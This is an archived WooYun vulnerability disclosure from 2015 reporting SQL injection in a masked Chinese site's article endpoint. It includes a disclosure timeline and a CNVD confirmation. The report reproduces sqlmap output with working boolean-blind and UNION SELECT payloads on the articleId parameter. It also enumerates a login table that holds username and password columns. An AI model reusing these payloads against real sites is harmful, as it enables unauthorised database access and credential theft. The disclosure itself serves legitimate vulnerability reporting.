乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2015-09-02: 细节已通知厂商并且等待厂商处理中 2015-09-05: cncert国家互联网应急中心暂未能联系到相关单位,细节仅向通报机构公开 2015-09-15: 细节向核心白帽子及相关领域专家公开 2015-09-25: 细节向普通白帽子公开 2015-10-05: 细节向实习白帽子公开 2015-10-20: 细节向公众公开
rt
http://**.**.**.**/findArticle?articleId=222&type=findone站点存在sql注射
sqlmap resumed the following injection point(s) from stored session:---Parameter: articleId (GET) Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: articleId=222 AND 9028=9028&type=findone Type: UNION query Title: MySQL UNION query (79) - 6 columns Payload: articleId=222 UNION ALL SELECT 79,79,CONCAT(0x71787a7a71,0x594b6645456d5a586c71,0x71717a7671),79,79,79#&type=findone---[14:24:46] [INFO] the back-end DBMS is MySQLweb server operating system: Linux CentOS 5.10web application technology: Apache 2.2.3, JSPback-end DBMS: MySQL 5[14:24:46] [WARNING] missing database parameter. sqlmap is going to use the current database to enumerate table(s) columns[14:24:46] [INFO] fetching current database[14:24:46] [INFO] fetching columns for table 'loginuser' in database 'sq_cqzgdcn'[14:25:07] [CRITICAL] unable to connect to the target URL or proxy. sqlmap is going to retry the request[14:25:08] [INFO] the SQL query used returns 11 entries[14:25:09] [INFO] retrieved: "userName","varchar(50)"[14:25:09] [INFO] retrieved: "userId","int(11)"[14:25:09] [INFO] retrieved: "loginName","varchar(50)"[14:25:09] [INFO] retrieved: "loginPassword","varchar(50)"[14:25:10] [INFO] retrieved: "email","varchar(30)"[14:25:31] [CRITICAL] unable to connect to the target URL or proxy. sqlmap is going to retry the request[14:25:32] [INFO] retrieved: "phone","varchar(20)"[14:25:32] [INFO] retrieved: "userNote","text"[14:25:32] [INFO] retrieved: "userState","int(11)"[14:25:53] [CRITICAL] unable to connect to the target URL or proxy. sqlmap is going to retry the request[14:25:55] [INFO] retrieved: "createTime","varchar(20)"[14:25:55] [INFO] retrieved: "job","varchar(50)"[14:25:55] [INFO] retrieved: "dePartMentId","int(20)"Database: sq_cqzgdcnTable: loginuser[11 columns]+---------------+-------------+| Column | Type |+---------------+-------------+| createTime | varchar(20) || dePartMentId | int(20) || email | varchar(30) || job | varchar(50) || loginName | varchar(50) || loginPassword | varchar(50) || phone | varchar(20) || userId | int(11) || userName | varchar(50) || userNote | text || userState | int(11) |+---------------+-------------+
尽快修复!
危害等级:中
漏洞Rank:8
确认时间:2015-09-05 08:48
CNVD确认所述情况,已经转由CNCERT下发给重庆分中心,由其后续协调网站管理单位处置.
暂无